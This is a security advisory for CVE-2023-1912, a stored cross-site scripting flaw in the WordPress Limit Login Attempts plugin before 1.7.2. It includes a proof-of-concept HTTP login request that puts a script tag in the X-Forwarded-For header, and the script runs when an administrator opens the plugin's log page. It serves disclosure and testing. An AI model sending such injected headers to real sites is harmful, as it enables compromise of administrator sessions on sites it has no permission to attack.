Limit Login Attempts < 1.7.2 – Unauthenticated Stored XSS | CVE 2023-1912

Description

The plugin does not sanitize and escape the IP address retrieved from headers such as X-Forwarded-For when the "Site Connection" settings is set to "From behind a reversy proxy", which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks

Proof of Concept

Setup: As admin, set the "Site Connection" settings to "From behind a reversy proxy" (/wp-admin/options-general.php?page=limit-login-attempts)

As unauthenticated, make multiple invalid login attempt with the following X-Forwarded-For header: 22.22.22.22<script>alert(1)</script>

POST /wp-login.php HTTP/2
Cookie: _ga=GA1.1.1425100944.1668087471; _ga_1PQ8LT9B4M=GS1.1.1668092159.2.0.1668092159.0.0.0; _ga_NCY6KM92V3=GS1.1.1670952626.1.0.1670952626.60.0.0; wordpress_test_cookie=WP%20Cookie%20check
Content-Length: 124
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: 22.22.22.22<script>alert(1)</script>

log=test&pwd=test&wp-submit=Log+In&testcookie=1

The XSS will be triggered when viewing the logs: https://example.com/wp-admin/options-general.php?page=limit-login-attempts